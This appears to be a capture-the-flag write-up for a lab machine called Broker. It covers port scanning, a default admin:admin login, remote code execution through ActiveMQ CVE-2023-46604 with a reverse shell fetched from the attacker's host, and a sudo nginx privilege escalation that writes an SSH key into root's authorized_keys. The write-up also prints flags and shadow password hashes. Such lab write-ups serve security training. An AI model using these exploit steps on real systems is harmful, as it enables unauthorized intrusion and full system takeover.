Broker

Recon

nmap_scan.log
[~] The config file is expected to be at "/home/rustscan/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.129.150.81:22
Open 10.129.150.81:80
Open 10.129.150.81:1883
Open 10.129.150.81:5672
Open 10.129.150.81:8161
Open 10.129.150.81:33539
Open 10.129.150.81:61613
Open 10.129.150.81:61614
Open 10.129.150.81:61616
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -vvv -sV -sC -Pn" on ip 10.129.150.81

PORT      STATE SERVICE    REASON  VERSION
22/tcp    open  ssh        syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJ+m7rYl1vRtnm789pH3IRhxI4CNCANVj+N5kovboNzcw9vHsBwvPX3KYA3cxGbKiA0VqbKRpOHnpsMuHEXEVJc=
|   256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOtuEdoYxTohG80Bo6YCqSzUY9+qbnAFnhsk4yAZNqhM
80/tcp    open  http       syn-ack nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  basic realm=ActiveMQRealm
|_http-title: Error 401 Unauthorized
1883/tcp  open  mqtt       syn-ack
| mqtt-subscribe: 
|   Topics and their most recent payloads: 
|     ActiveMQ/Advisory/MasterBroker: 
|_    ActiveMQ/Advisory/Consumer/Topic/#: 
5672/tcp  open  amqp?      syn-ack
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, GetRequest, HTTPOptions, RPCCheck, RTSPRequest, SSLSessionReq, TerminalServerCookie: 
|     AMQP
|     AMQP
|     amqp:decode-error
|_    7Connection from client using unsupported AMQP attempted
|_amqp-info: ERROR: AQMP:handshake expected header (1) frame, but was 65
8161/tcp  open  http       syn-ack Jetty 9.4.39.v20210325
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  basic realm=ActiveMQRealm
|_http-server-header: Jetty(9.4.39.v20210325)
|_http-title: Error 401 Unauthorized
33539/tcp open  tcpwrapped syn-ack
61613/tcp open  stomp      syn-ack Apache ActiveMQ
| fingerprint-strings: 
|   HELP4STOMP: 
|     ERROR
|     content-type:text/plain
|     message:Unknown STOMP action: HELP
|     org.apache.activemq.transport.stomp.ProtocolException: Unknown STOMP action: HELP
|     org.apache.activemq.transport.stomp.ProtocolConverter.onStompCommand(ProtocolConverter.java:258)
|     org.apache.activemq.transport.stomp.StompTransportFilter.onCommand(StompTransportFilter.java:85)
|     org.apache.activemq.transport.TransportSupport.doConsume(TransportSupport.java:83)
|     org.apache.activemq.transport.tcp.TcpTransport.doRun(TcpTransport.java:233)
|     org.apache.activemq.transport.tcp.TcpTransport.run(TcpTransport.java:215)
|_    java.lang.Thread.run(Thread.java:750)
61614/tcp open  http       syn-ack Jetty 9.4.39.v20210325
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
|_http-server-header: Jetty(9.4.39.v20210325)
|_http-title: Site doesn't have a title.
| http-methods: 
|   Supported Methods: GET HEAD TRACE OPTIONS
|_  Potentially risky methods: TRACE
61616/tcp open  apachemq   syn-ack ActiveMQ OpenWire transport 5.15.15
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :

HTTP (80)

When visited we are prompted for username and password, so I just tested admin:admin and it worked.

Writeup.png

Creds: admin:admin

/admin endpoint shows the version of ActiveMQ which is 5.15.15

Writeup-1.png

CVE-2023-46604

CVE-2023-46604, The Java OpenWire protocol marshaller is vulnerable to Remote Code Execution...

CVE-2023-46604 PoC

└─$ git clone https://github.com/evkl1d/CVE-2023-46604.git
└─$ vi CVE-2023-46604/poc.xml
---
└─$ py -m http.server 80
---
└─$ rlwrap nc -lnvp 4444
---
└─$ py CVE-2023-46604/exploit.py -i 10.129.150.81 -u http://10.10.14.42/CVE-2023-46604/poc.xml
Writeup-2.png

User.txt

activemq@broker:/opt/apache-activemq-5.15.15/bin$ cd
activemq@broker:~$ cat user.txt
9668cd1af2f292334666ddb0f3a4d901

Privilege Escalation

We can run nginx as sudo.

activemq@broker:~$ sudo -l
Matching Defaults entries for activemq on broker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User activemq may run the following commands on broker:
    (ALL : ALL) NOPASSWD: /usr/sbin/nginx

nginx_privesc_sudo.md

└─$ ssh-keygen -f id_rsa -P x -q
└─$ cat id_rsa.pub
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIECjGlqOyS4hvpqEb4UCogCeURdkD6dmbFajAefznSfP woyag@kraken
echo "[+] Creating configuration..."
echo -e "user root;\nworker_processes 4;\npid /tmp/nginx.pid;\nevents {\n\tworker_connections 768;\n}\nhttp {\n\tserver {\n\t\tlisten 1339;\n\t\troot /;\n\t\tautoindex on;\n\t\tdav_methods PUT;\n\t}\n}" > /tmp/nginx_pwn.conf
echo "[+] Loading configuration..."
sudo nginx -c /tmp/nginx_pwn.conf
echo "[+] Add key to root user..."
curl -X PUT localhost:1339/root/.ssh/authorized_keys -d "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIECjGlqOyS4hvpqEb4UCogCeURdkD6dmbFajAefznSfP woyag@kraken"
echo "[+] Use the SSH key to get access"
└─$ ssh root@10.129.150.81 -i id_rsa
root@broker:~# id
uid=0(root) gid=0(root) groups=0(root)
root@broker:~# ls
cleanup.sh  root.txt
root@broker:~# cat root.txt
632affbbe1f381f1cf81acbffcea6747
root@broker:~# cat /etc/shadow | grep ':\$'
root:$y$j9T$S6NkiGlTDU3IUcdBZEjJe0$sSHRUiGL/v4FZkWjU.HZ6cX2vsMY/rdFBTt25LbGxf1:19666:0:99999:7:::
activemq:$y$j9T$5eMce1NhiF0t9/ZVwn39P1$pCfvgXtARGXPYDdn2AVdkCnXDf7YO7He/x666g6qLM5:19666:0:99999:7:::
PreviousBroScienceNextBusqueda

Last updated